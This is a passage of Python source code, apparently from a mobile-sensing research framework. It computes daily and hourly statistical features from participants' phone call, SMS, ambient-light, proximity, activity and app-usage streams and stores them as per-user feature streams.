self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
def process_callsmsstream_day_data(self, user_id: str, callstream: List[DataPoint],
smsstream: List[DataPoint], input_callstream: DataStream, input_smsstream: DataStream):
"""
Process all the call and sms related features and store them as datastreams.
:param str user_id: UUID of the stream owner
:param List(DataPoint) callstream: Phone call duration data stream
:param List(DataPoint) smsstream: SMS length data stream
:param DataStream input_callstream: DataStream object of phone call stream
:param DataStream input_smsstream: DataStream object of SMS call stream
:return:
"""
try:
data = self.average_inter_phone_call_sms_time_hourly(callstream, smsstream)
if data:
self.store_stream(filepath="average_inter_phone_call_sms_time_hourly.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_inter_phone_call_sms_time_four_hourly(callstream, smsstream)
if data:
self.store_stream(filepath="average_inter_phone_call_sms_time_four_hourly.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_inter_phone_call_sms_time_daily(callstream, smsstream)
if data:
self.store_stream(filepath="average_inter_phone_call_sms_time_daily.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_inter_phone_call_sms_time_daily(callstream, smsstream)
if data:
self.store_stream(filepath="variance_inter_phone_call_sms_time_daily.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_inter_phone_call_sms_time_hourly(callstream, smsstream)
if data:
self.store_stream(filepath="variance_inter_phone_call_sms_time_hourly.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_inter_phone_call_sms_time_four_hourly(callstream, smsstream)
if data:
self.store_stream(filepath="variance_inter_phone_call_sms_time_four_hourly.json",
input_streams=[input_callstream, input_smsstream],
user_id=user_id, data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_inter_phone_call_time_hourly(callstream)
if data:
self.store_stream(filepath="average_inter_phone_call_time_hourly.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_inter_phone_call_time_four_hourly(callstream)
if data:
self.store_stream(filepath="average_inter_phone_call_time_four_hourly.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_inter_phone_call_time_daily(callstream)
if data:
self.store_stream(filepath="average_inter_phone_call_time_daily.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_inter_phone_call_time_hourly(callstream)
if data:
self.store_stream(filepath="variance_inter_phone_call_time_hourly.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_inter_phone_call_time_four_hourly(callstream)
if data:
self.store_stream(filepath="variance_inter_phone_call_time_four_hourly.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_inter_phone_call_time_daily(callstream)
if data:
self.store_stream(filepath="variance_inter_phone_call_time_daily.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_inter_sms_time_hourly(smsstream)
if data:
self.store_stream(filepath="average_inter_sms_time_hourly.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_inter_sms_time_four_hourly(smsstream)
if data:
self.store_stream(filepath="average_inter_sms_time_four_hourly.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_inter_sms_time_daily(smsstream)
if data:
self.store_stream(filepath="average_inter_sms_time_daily.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_inter_sms_time_hourly(smsstream)
if data:
self.store_stream(filepath="variance_inter_sms_time_hourly.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_inter_sms_time_four_hourly(smsstream)
if data:
self.store_stream(filepath="variance_inter_sms_time_four_hourly.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_inter_sms_time_daily(smsstream)
if data:
self.store_stream(filepath="variance_inter_sms_time_daily.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_call_duration_daily(callstream)
if data:
self.store_stream(filepath="average_call_duration_daily.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_call_duration_hourly(callstream)
if data:
self.store_stream(filepath="average_call_duration_hourly.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_call_duration_four_hourly(callstream)
if data:
self.store_stream(filepath="average_call_duration_four_hourly.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_sms_length_daily(smsstream)
if data:
self.store_stream(filepath="average_sms_length_daily.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_sms_length_hourly(smsstream)
if data:
self.store_stream(filepath="average_sms_length_hourly.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_sms_length_four_hourly(smsstream)
if data:
self.store_stream(filepath="average_sms_length_four_hourly.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_sms_length_daily(smsstream)
if data:
self.store_stream(filepath="variance_sms_length_daily.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_sms_length_hourly(smsstream)
if data:
self.store_stream(filepath="variance_sms_length_hourly.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_sms_length_four_hourly(smsstream)
if data:
self.store_stream(filepath="variance_sms_length_four_hourly.json",
input_streams=[input_smsstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_call_duration_daily(callstream)
if data:
self.store_stream(filepath="variance_call_duration_daily.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_call_duration_hourly(callstream)
if data:
self.store_stream(filepath="variance_call_duration_hourly.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_call_duration_four_hourly(callstream)
if data:
self.store_stream(filepath="variance_call_duration_four_hourly.json",
input_streams=[input_callstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
def process_light_day_data(self, user_id: str, lightdata: List[DataPoint], input_lightstream: DataStream):
"""
Process all the ambient light related features and store the output streams.
:param str user_id: UUID of the stream owner
:param List(DataPoint) lightdata: Ambient light data stream
:param DataStream input_lightstream: DataStream object of Ambient light stream
:return:
"""
try:
data = self.average_ambient_light_daily(lightdata)
if data:
self.store_stream(filepath="average_ambient_light_daily.json",
input_streams=[input_lightstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_ambient_light_hourly(lightdata)
if data:
self.store_stream(filepath="average_ambient_light_hourly.json",
input_streams=[input_lightstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.average_ambient_light_four_hourly(lightdata)
if data:
self.store_stream(filepath="average_ambient_light_four_hourly.json",
input_streams=[input_lightstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_ambient_light_daily(lightdata)
if data:
self.store_stream(filepath="variance_ambient_light_daily.json",
input_streams=[input_lightstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_ambient_light_hourly(lightdata)
if data:
self.store_stream(filepath="variance_ambient_light_hourly.json",
input_streams=[input_lightstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.variance_ambient_light_four_hourly(lightdata)
if data:
self.store_stream(filepath="variance_ambient_light_four_hourly.json",
input_streams=[input_lightstream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
def process_proximity_day_data(self, user_id: str, proximitystream: List[DataPoint],
input_proximitystream: DataStream):
"""
Process all proximity related modules
:param str user_id: UUID of the stream owner
:param List(DataPoint) proximitystream: Phone proximity data stream
:param DataStream input_proximitystream: DataStream object of proximity data stream
:return:
"""
try:
data = self.calculate_phone_outside_duration(proximitystream)
if data:
self.store_stream(filepath="phone_outside_duration.json",
input_streams=[input_proximitystream],
user_id=user_id, data=data)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
def get_overlapped_value(self, px1, py1, px2, py2):
x = max(px1, px2)
y = min(py1, py2)
if x > y:
return 0
return (y - x).total_seconds() / 60
def process_appusage_context_day_data(self, user_id: str, app_usage_data: List[DataPoint],
input_usage_stream: DataStream, gps_semantic_data: List[DataPoint], input_gps_semantic_stream: DataStream):
"""
Process appusage related modules
:param str user_id: UUID of stream owner
:param List(DataPoint) app_usage_data: App usage stream data
:param input_usage_stream: DataStram object of app usage stream
:param gps_semantic_data: GPS semantic location data splitted daywise (localtime false)
:param input_gps_semantic_stream: DataStream object of the gps semantic daysiwse data
:return:
"""
if not app_usage_data:
return
total = [{}, {}, {}, {}]
try:
for category, data in app_usage_data[0].sample.items():
total[0][category] = 0
total[1][category] = 0
total[2][category] = 0
total[3][category] = 0
for d in data:
total[0][category] += (d["end_time"] - d["start_time"]).total_seconds() / 60
for gd in gps_semantic_data:
val = self.get_overlapped_value(d["start_time"], d["end_time"], gd.start_time, gd.end_time)
if gd.sample == "work":
total[1][category] += val
elif gd.sample == "home":
total[2][category] += val
total[3][category] = total[0][category] - total[1][category] - total[2][category]
context_total = [24, 0, 0, 0]
for gd in gps_semantic_data:
if gd.sample == "work":
context_total[1] += (gd.end_time - gd.start_time).total_seconds() / (60 * 60)
elif gd.sample == "home":
context_total[2] += (gd.end_time - gd.start_time).total_seconds() / (60 * 60)
context_total[3] = context_total[0] - context_total[1] - context_total[2]
st = app_usage_data[0].start_time.date()
start_time = datetime.datetime.combine(st, datetime.time.min)
start_time = start_time.replace(tzinfo=app_usage_data[0].start_time.tzinfo)
end_time = datetime.datetime.combine(st, datetime.time.max)
end_time = end_time.replace(tzinfo=app_usage_data[0].start_time.tzinfo)
dp1 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[0])
if input_gps_semantic_stream:
dp2 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[1])
dp3 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[2])
dp4 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[3])
self.store_stream(filepath="appusage_duration_total_by_category.json",
input_streams=[input_usage_stream], user_id=user_id,
data=[dp1], localtime=False)
if input_gps_semantic_stream:
self.store_stream(filepath="appusage_duration_total_by_category_work.json",
input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
data=[dp2], localtime=False)
self.store_stream(filepath="appusage_duration_total_by_category_home.json",
input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
data=[dp3], localtime=False)
self.store_stream(filepath="appusage_duration_total_by_category_outside.json",
input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
data=[dp4], localtime=False)
for i in range(4):
if context_total[i] == 0:
continue
for category in app_usage_data[0].sample:
total[i][category] /= context_total[i]
dp5 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[0])
if input_gps_semantic_stream:
dp6 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[1])
dp7 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[2])
dp8 = DataPoint(start_time, end_time, app_usage_data[0].offset, total[3])
self.store_stream(filepath="appusage_duration_average_by_category.json",
input_streams=[input_usage_stream], user_id=user_id,
data=[dp5], localtime=False)
if input_gps_semantic_stream:
self.store_stream(filepath="appusage_duration_average_by_category_work.json",
input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
data=[dp6], localtime=False)
self.store_stream(filepath="appusage_duration_average_by_category_home.json",
input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
data=[dp7], localtime=False)
self.store_stream(filepath="appusage_duration_average_by_category_outside.json",
input_streams=[input_usage_stream, input_gps_semantic_stream], user_id=user_id,
data=[dp8], localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
def process_appcategory_day_data(self, user_id: str, appcategorystream: List[DataPoint],
input_appcategorystream: DataStream):
"""
process all app category related features.
:param str user_id: UUID of the stream owner
:param List(DataPoint) appcategorystream: App category stream data
:param DataStream input_appcategorystream: DataStream object of the app category stream
:return:
"""
try:
data = []
for d in appcategorystream:
if type(d.sample) is not str:
continue
dnew = d
dnew.sample = self.get_app_category(d.sample)
data.append(dnew)
if data:
self.store_stream(filepath="app_usage_category.json",
input_streams=[input_appcategorystream],
user_id=user_id, data=data)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
def get_total_phone_activity_time_by_type(self, data: List[DataPoint], activity_type: float) -> List[DataPoint]:
"""
Total time in a day of type 'activity_type'.
:param List(DataPoint) data: Phone activity API stream data points
:param float activity_type: The activity summary to be calculated ranging from 0 to 7
:return: List with single data point including the total time phone found the 'activity_type' in minutes
:rtype: List(DataPoint)
"""
if not data:
return None
i = 0
total = 0
while i < len(data):
if data[i].sample[0] == activity_type:
start = data[i].start_time
i += 1
while i < len(data) and data[i].sample[0] == activity_type:
i += 1
if i == len(data):
last = data[-1].start_time
else:
last = data[i].start_time
total += (last - start).total_seconds()
i += 1
start_time = copy.deepcopy(data[0].start_time)
start_time = start_time.replace(hour=0, minute=0, second=0, microsecond=0)
end_time = datetime.datetime.combine(start_time.date(), datetime.time.max)
end_time = end_time.replace(tzinfo=data[0].start_time.tzinfo)
return [DataPoint(start_time, end_time, data[0].offset, total/60)]
def process_phone_activity_day_data(self, user_id: str, activity_data: List[DataPoint],
input_activity_stream: DataStream):
"""
Process all phone activity API stream related features
:param str user_id: UUID of the stream owner
:param List(DataPoint) activity_data: Phone activity API stream data points
:param DataStream input_activity_stream: DataStream object of phone activity data
:return:
"""
try:
data = self.get_total_phone_activity_time_by_type(activity_data, IN_VEHICLE)
self.store_stream(filepath="driving_time_from_phone_activity.json",
input_streams=[input_activity_stream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_phone_activity_time_by_type(activity_data, ON_BICYCLE)
self.store_stream(filepath="bicycle_time_from_phone_activity.json",
input_streams=[input_activity_stream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_phone_activity_time_by_type(activity_data, STILL)
self.store_stream(filepath="still_time_from_phone_activity.json",
input_streams=[input_activity_stream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_phone_activity_time_by_type(activity_data, ON_FOOT)
self.store_stream(filepath="on_foot_time_from_phone_activity.json",
input_streams=[input_activity_stream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_phone_activity_time_by_type(activity_data, TILTING)
self.store_stream(filepath="tilting_time_from_phone_activity.json",
input_streams=[input_activity_stream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_phone_activity_time_by_type(activity_data, WALKING)
self.store_stream(filepath="walking_time_from_phone_activity.json",
input_streams=[input_activity_stream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_phone_activity_time_by_type(activity_data, RUNNING)
self.store_stream(filepath="running_time_from_phone_activity.json",
input_streams=[input_activity_stream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_total_phone_activity_time_by_type(activity_data, UNKNOWN)
self.store_stream(filepath="unknown_time_from_phone_activity.json",
input_streams=[input_activity_stream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
def get_percent_initiated_call(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Percent of time the user initiated a call for a day.
:param List(DataPoint) data: Call type stream data points
:return: List of single data point with percent of call initiated for the day
:rtype: List(DataPoint)
"""
if not data:
return None
i = 0
count = 0
for d in data:
if d.sample == OUTGOING_TYPE:
count += 1
start_time = copy.deepcopy(data[0].start_time)
start_time = start_time.replace(hour=0, minute=0, second=0, microsecond=0)
end_time = datetime.datetime.combine(start_time.date(), datetime.time.max)
end_time = end_time.replace(tzinfo=data[0].start_time.tzinfo)
return [DataPoint(start_time, end_time, data[0].offset, 100.0*count/len(data))]
def get_percent_initiated_sms(self, data: List[DataPoint]) -> List[DataPoint]:
"""
Percent of time the user initiated a SMS for a day.
:param List(DataPoint) data: SMS type stream data points
:return: List of single data point with percent of SMS initiated for the day
:rtype: List(DataPoint)
"""
if not data:
return None
i = 0
count = 0
for d in data:
if d.sample == MESSAGE_TYPE_SENT:
count += 1
start_time = copy.deepcopy(data[0].start_time)
start_time = start_time.replace(hour=0, minute=0, second=0, microsecond=0)
end_time = datetime.datetime.combine(start_time.date(), datetime.time.max)
end_time = end_time.replace(tzinfo=data[0].start_time.tzinfo)
return [DataPoint(start_time, end_time, data[0].offset, 100.0*count/len(data))]
def get_percent_initiated_callsms(self, calldata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Percent of time the user initiated a Call or SMS for a day.
:param List(DataPoint) calldata: Call type stream data points
:param List(DataPoint) smsdata: SMS type stream data points
:return: List of single data point with percent of Call and SMS initiated for the day
:rtype: List(DataPoint)
"""
data = calldata + smsdata
if not data:
return None
i = 0
count = 0
for d in data:
if d.sample == OUTGOING_TYPE:
count += 1
start_time = copy.deepcopy(data[0].start_time)
start_time = start_time.replace(hour=0, minute=0, second=0, microsecond=0)
end_time = datetime.datetime.combine(start_time.date(), datetime.time.max)
end_time = end_time.replace(tzinfo=data[0].start_time.tzinfo)
return [DataPoint(start_time, end_time, data[0].offset, 100.0*count/len(data))]
def process_callsms_type_day_data(self, user_id: str, calltype_data: List[DataPoint], smstype_data: List[DataPoint],
input_call_type_stream: DataStream, input_sms_type_stream: DataStream):
"""
Processing all streams related to call type and sms type streams.
:param str user_id: UUID of the stream owner
:param List(DataPoint) calltype_data: Call type stream data points
:param List(DataPoint) smstype_data: SMS type stream data points
:param DataStream input_call_type_stream: DataStream object of call type stream
:param DataStream input_sms_type_stream: DataStream object of sms type stream
:return:
"""
try:
data = self.get_percent_initiated_call(calltype_data)
self.store_stream(filepath="call_initiated_percent_daily.json",
input_streams=[input_call_type_stream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_percent_initiated_sms(smstype_data)
self.store_stream(filepath="sms_initiated_percent_daily.json",
input_streams=[input_sms_type_stream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
try:
data = self.get_percent_initiated_callsms(calltype_data, smstype_data)
self.store_stream(filepath="callsms_initiated_percent_daily.json",
input_streams=[input_call_type_stream, input_sms_type_stream], user_id=user_id,
data=data, localtime=False)
except Exception as e:
self.CC.logging.log("Exception:", str(e))
self.CC.logging.log(str(traceback.format_exc()))
def process_data(self, user_id: str, all_user_streams: dict, all_days: List[str]):
"""
Getting all the necessary input datastreams for a user
and run all feature processing modules for all the days
of the user.
:param str user_id: UUID of the stream owner
:param dict all_user_streams: Dictionary containing all the user streams, where key is the stream name, value
is the stream metadata
:param List(str) all_days: List of all days for the processing in the format 'YYYYMMDD'
:return:
"""
input_callstream = None
input_smsstream = None
input_proximitystream = None
input_cuappusagestream = None
input_appcategorystream = None
input_lightstream = None
input_appusage_stream = None
input_gpssemanticstream = None
input_callnumberstream = None
input_smsnumberstream = None
input_activity_stream = None
input_call_type_stream = None
input_sms_type_stream = None
call_stream_name = 'CU_CALL_DURATION--edu.dartmouth.eureka'
sms_stream_name = 'CU_SMS_LENGTH--edu.dartmouth.eureka'
proximity_stream_name = 'PROXIMITY--org.md2k.phonesensor--PHONE'
cu_appusage_stream_name = 'CU_APPUSAGE--edu.dartmouth.eureka'
light_stream_name = 'AMBIENT_LIGHT--org.md2k.phonesensor--PHONE'
appcategory_stream_name = "org.md2k.data_analysis.feature.phone.app_usage_category"
appusage_stream_name = "org.md2k.data_analysis.feature.phone.app_usage_interval"
gpssemantic_stream_name = "org.md2k.data_analysis.feature.gps_semantic_location.daywise_split.utc"
call_number_stream_name = "CU_CALL_NUMBER--edu.dartmouth.eureka"
sms_number_stream_name = "CU_SMS_NUMBER--edu.dartmouth.eureka"
activity_stream_name = "ACTIVITY_TYPE--org.md2k.phonesensor--PHONE"
call_type_stream_name = "CU_CALL_TYPE--edu.dartmouth.eureka"
sms_type_stream_name = "CU_SMS_TYPE--edu.dartmouth.eureka"
streams = all_user_streams
days = None
if not streams or not len(streams):
self.CC.logging.log('No streams found for user %s for feature %s'
% (str(user_id), self.__class__.__name__))
return
for stream_name, stream_metadata in streams.items():
if stream_name == call_stream_name:
input_callstream = stream_metadata
elif stream_name == sms_stream_name:
input_smsstream = stream_metadata
elif stream_name == proximity_stream_name:
input_proximitystream = stream_metadata
elif stream_name == cu_appusage_stream_name:
input_cuappusagestream = stream_metadata
elif stream_name == light_stream_name:
input_lightstream = stream_metadata
elif stream_name == call_number_stream_name:
input_callnumberstream = stream_metadata
elif stream_name == sms_number_stream_name:
input_smsnumberstream = stream_metadata
elif stream_name == activity_stream_name:
input_activity_stream = stream_metadata
elif stream_name == call_type_stream_name:
input_call_type_stream = stream_metadata
elif stream_name == sms_type_stream_name:
input_sms_type_stream = stream_metadata
# Processing Call and SMS related features
if not input_callstream:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, call_stream_name,
str(user_id)))
elif not input_smsstream:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, sms_stream_name,
str(user_id)))
else:
for day in all_days:
callstream = self.get_data_by_stream_name(call_stream_name, user_id, day, localtime=False)
callstream = self.get_filtered_data(callstream, lambda x: (type(x) is float and x >= 0))
smsstream = self.get_data_by_stream_name(sms_stream_name, user_id, day, localtime=False)
smsstream = self.get_filtered_data(smsstream, lambda x: (type(x) is float and x >= 0))
self.process_callsmsstream_day_data(user_id, callstream, smsstream, input_callstream, input_smsstream)
if not input_call_type_stream:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, call_type_stream_name,
str(user_id)))
elif not input_sms_type_stream:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, sms_type_stream_name,
str(user_id)))
else:
for day in all_days:
calltype_data = self.get_data_by_stream_name(call_type_stream_name, user_id, day, localtime=False)
calltype_data = self.get_filtered_data(calltype_data, lambda x: (type(x) is float))
smstype_data = self.get_data_by_stream_name(sms_type_stream_name, user_id, day, localtime=False)
smstype_data = self.get_filtered_data(smstype_data, lambda x: (type(x) is float))
self.process_callsms_type_day_data(user_id, calltype_data, smstype_data, input_call_type_stream,
input_sms_type_stream)
# processing proximity sensor related features
if not input_proximitystream:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, proximity_stream_name,
str(user_id)))
else:
for day in all_days:
proximitystream = self.get_data_by_stream_name(proximity_stream_name, user_id, day)
proximitystream = self.get_filtered_data(proximitystream, lambda x: (type(x) is float and x >= 0))
self.process_proximity_day_data(user_id, proximitystream, input_proximitystream)
# Processing ambient light related features
if not input_lightstream:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, light_stream_name,
str(user_id)))
else:
for day in all_days:
lightstream = self.get_data_by_stream_name(light_stream_name, user_id, day, localtime=False)
lightstream = self.get_filtered_data(lightstream, lambda x: (type(x) is float and x >= 0))
self.process_light_day_data(user_id, lightstream, input_lightstream)
# processing app usage and category related features
if not input_cuappusagestream:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, cu_appusage_stream_name,
str(user_id)))
else:
for day in all_days:
appusagestream = self.get_data_by_stream_name(cu_appusage_stream_name, user_id, day)
appusagestream = self.get_filtered_data(appusagestream, lambda x: type(x) is str)
self.process_appcategory_day_data(user_id, appusagestream, input_cuappusagestream)
# Processing phone touche and typing related features
streams = self.CC.get_user_streams(user_id)
if not streams or not len(streams):
self.CC.logging.log('No streams found for user %s for feature %s'
% (str(user_id), self.__class__.__name__))
return
latest_appcategorystreamid = self.get_latest_stream_id(user_id,
appcategory_stream_name)
if not latest_appcategorystreamid:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, appcategory_stream_name,
str(user_id)))
else:
input_appcategorystream = self.CC.get_stream_metadata(latest_appcategorystreamid[0]['identifier'])
for day in all_days:
appcategorydata = self.get_data_by_stream_name(appcategory_stream_name, user_id,
day, localtime=False, ingested_stream=False)
appcategorydata = self.get_filtered_data(appcategorydata, lambda x: (type(x) is list and len(x) == 4))
self.process_appusage_day_data(user_id, appcategorydata, input_appcategorystream)
streams = self.CC.get_user_streams(user_id)
if not streams or not len(streams):
self.CC.logging.log('No streams found for user %s for feature %s'
% (str(user_id), self.__class__.__name__))
return
latest_appusage_streamid = self.get_latest_stream_id(user_id,
appusage_stream_name)
latest_gps_semantic_streamid = self.get_latest_stream_id(user_id,
gpssemantic_stream_name)
if not latest_appusage_streamid:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, appusage_stream_name,
str(user_id)))
else:
input_appusage_stream = self.CC.get_stream_metadata(latest_appusage_streamid[0]['identifier'])
input_gpssemanticstream = self.CC.get_stream_metadata(latest_gps_semantic_streamid[0]['identifier'])
for day in all_days:
app_usage_data = self.get_data_by_stream_name(appusage_stream_name, user_id, day,
localtime=False,
ingested_stream=False)
